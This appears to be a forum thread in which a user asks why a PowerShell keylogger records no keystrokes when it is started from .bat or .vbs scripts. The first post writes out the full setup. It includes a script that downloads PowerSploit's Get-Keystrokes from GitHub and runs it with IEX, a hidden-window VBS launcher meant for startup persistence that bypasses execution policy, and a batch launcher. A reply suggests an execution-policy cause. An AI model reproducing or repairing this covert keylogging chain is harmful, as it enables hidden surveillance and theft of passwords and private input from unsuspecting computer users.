Jump to content

Get-Keystrokes does not work when executing from .bat or .vbs scripts


codeeer

Recommended Posts

Hi

So I have this simple script, keylogger.ps1

$time = Get-Date -format "yyyy-MM-dd_HH-mm"

$folder = $ENV:UserProfile
$folder += '\Desktop\' + $time + '_keystrokes.txt'

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
Get-Keystrokes -LogPath $folder

It gets the powershell keylogger and execute it. Creating a log file on the desktop with year and day. 

This works fine when I run ./keylogger.ps1 from powershell 

Then I tried to add some persistence so it start with the computer, so I added  this: 

 updater.vbs script: 

Set objShell = CreateObject("Wscript.shell")
objShell.run("powershell -WindowStyle Hidden -executionpolicy bypass -file C:\Users\user\Desktop\keylogger.ps1")


The code is executed, but key strokes are not captured!!

Same thing here, I run the script via a .bat file

@echo off
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\user\Desktop\keylogger.ps1'"

The code is executed, file is created for logging key strokes, but no key strokes are captured!!

Anybody know why this is?

Link to comment
Share on other sites

9 minutes ago, Decoy said:

I think in newer versions of Powershell running scripts is turned off by default. I think you have to turn it on first. Do you know what version of Powershell you are testing on?

So, to be clear, the script does run. Both the .vbs script and the .bat file runs the PowerShell script "keylogger.ps1". I know this because the first part of the powershell script works fine, it creates a empty file for logging keystrokes.

The problem is that the keystrokes are not being registered when the powershell script is executed via a .bat script or a .vbs script.  

The keystrokes are registed if I run keylogger.ps1 via the powershell terminal, but NOT when I execute the keylogger.ps1 script via .bat or .vbs scripts. 

So, my question is, has anyone gotten this to work?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...